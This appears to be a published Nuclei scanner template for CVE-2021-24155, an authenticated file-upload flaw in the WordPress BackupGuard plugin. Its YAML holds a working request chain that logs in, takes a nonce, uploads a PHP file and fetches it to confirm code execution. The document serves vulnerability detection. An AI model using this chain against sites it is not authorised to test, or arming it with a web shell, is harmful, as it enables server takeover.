WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload

ID: CVE-2021-24155

Severity: high

Author: theamanrawat

Tags: cve,cve2021,authenticated,wp,packetstorm,wp-plugin,rce,wordpress,backup,wpscan,intrusive,backup-guard

Description

WordPress Backup Guard plugin before 1.6.0 is susceptible to authenticated arbitrary file upload. The plugin does not ensure that imported files are in SGBP format and extension, allowing high-privilege users to upload arbitrary files, including PHP, possibly leading to remote code execution.

YAML Source

id: CVE-2021-24155

info:
  name: WordPress BackupGuard <1.6.0 - Authenticated Arbitrary File Upload
  author: theamanrawat
  severity: high
  description: |
    WordPress Backup Guard plugin before 1.6.0 is susceptible to authenticated arbitrary file upload. The plugin does not ensure that imported files are in SGBP format and extension, allowing high-privilege users to upload arbitrary files, including PHP, possibly leading to remote code execution.
  impact: |
    Remote code execution
  remediation: Fixed in version 1.6.0.
  reference:
    - https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb
    - https://wordpress.org/plugins/backup/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24155
    - http://packetstormsecurity.com/files/163382/WordPress-Backup-Guard-1.5.8-Shell-Upload.html
    - https://github.com/0dayNinja/CVE-2021-24155.rb
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24155
    cwe-id: CWE-434
    epss-score: 0.96281
    epss-percentile: 0.99534
    cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: backup-guard
    product: backup_guard
    framework: wordpress
  tags: cve,cve2021,authenticated,wp,packetstorm,wp-plugin,rce,wordpress,backup,wpscan,intrusive,backup-guard

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=backup_guard_backups HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token={{nonce}} HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: multipart/form-data; boundary=---------------------------204200867127808062083805313921

        -----------------------------204200867127808062083805313921
        Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
        Content-Type: application/x-php

        <?php

        echo "CVE-2021-24155";

        ?>

        -----------------------------204200867127808062083805313921--
      - |
        GET /wp-content/uploads/backup-guard/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(header_4, "text/html")
          - status_code_4 == 200
          - contains(body_3, '{\"success\":1}')
          - contains(body_4, 'CVE-2021-24155')
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - BG_BACKUP_STRINGS = {"nonce":"([0-9a-zA-Z]+)"};
        internal: true
# digest: 4a0a004730450220449993bd257861080974af068330727b2b65382c967ce4846764ad3ffd587403022100d90708be42f3e8a8ca9b70a1f52bda56aa85785ae0c0044bc772e1921bd5d2b0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24155.yaml"

View on Github